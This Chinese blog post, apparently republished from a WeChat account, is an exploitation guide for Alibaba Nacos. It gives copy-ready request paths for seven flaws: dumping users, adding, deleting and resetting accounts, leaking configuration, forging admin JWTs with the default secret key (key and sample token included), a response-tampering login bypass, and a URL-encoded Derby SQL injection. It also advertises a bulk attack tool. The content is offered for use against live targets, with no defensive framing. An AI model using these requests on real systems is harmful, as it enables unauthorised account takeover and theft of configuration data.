Nacos 漏洞利用姿势大全

admin 2024年4月18日08:33:58评论295 views字数 1280阅读4分16秒阅读模式

Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

Nacos 漏洞利用姿势大全

指纹:app="nacos"

默认密码nacos nacos就不说了

漏洞1获取已有的用户列表的账号和密码

在路径后面加上/nacos/v1/auth/users?pageNo=1&pageSize=9可以获取到已有的用户名和密码,可以把User-Agent头改为Nacos-Server,如图

Nacos 漏洞利用姿势大全

漏洞2任意用户添加

更改提交方式为POST , 访问/nacos/v1/auth/users?username=test111&password=123456

新建一个账号test111,可以看到创建用户成功,如图

Nacos 漏洞利用姿势大全

使用该账号可以发现登录成功,如图

Nacos 漏洞利用姿势大全

漏洞3任意用户删除

更改提交方式为DELETE , 访问DELETE /nacos/v1/auth/users?username=test111

可以看到用户删除成功,如图

Nacos 漏洞利用姿势大全

漏洞4用户密码重置

更改提交方式为PUT,访问 /nacos/v1/auth/users?accessToken=&username=test1&newPassword=test222

可以看到用户密码更新成功,如图

Nacos 漏洞利用姿势大全

漏洞5配置信息泄露

在路径后面加上:/nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99

Nacos 漏洞利用姿势大全

洞6  token.secret.key默认配置(QVD-2023-6271)

SecretKey012345678901234567890123456789012345678901234567890123456789
https://jwt.io/

Nacos 漏洞利用姿势大全

http://shijianchuo.wiicha.com/

Nacos 漏洞利用姿势大全

Nacos 漏洞利用姿势大全

在登录请求中,拦截数据包,添加Authorization信息,拦截放回包后放包

Authorization: Bearer 你的token

Nacos 漏洞利用姿势大全利用方式2:

登陆界面输入任意账户密码 ,点击登录。更改改返回包状态码跟body

Nacos 漏洞利用姿势大全

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3NTA4Mzg3N30.mIjNX6MXNF3FgQNTl-FduWpsaTSZrOQZxTCu7Tg46ZU","tokenTtl": 18000,"globalAdmin": true,"username":"nacos"}

洞7 Nacos Derby SQL注入漏洞  (CNVD-2020-67618)

/nacos/v1/cs/ops/derby?sql=%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%75%73%65%72%73

Nacos 漏洞利用姿势大全

批量工具放知识星球

Nacos 漏洞利用姿势大全

 

原文始发于微信公众号(丁永博的成长日记):Nacos 漏洞利用姿势大全-附批量工具

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月18日08:33:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nacos 漏洞利用姿势大全http://cn-sec.com/archives/2668518.html

发表评论

匿名网友 填写信息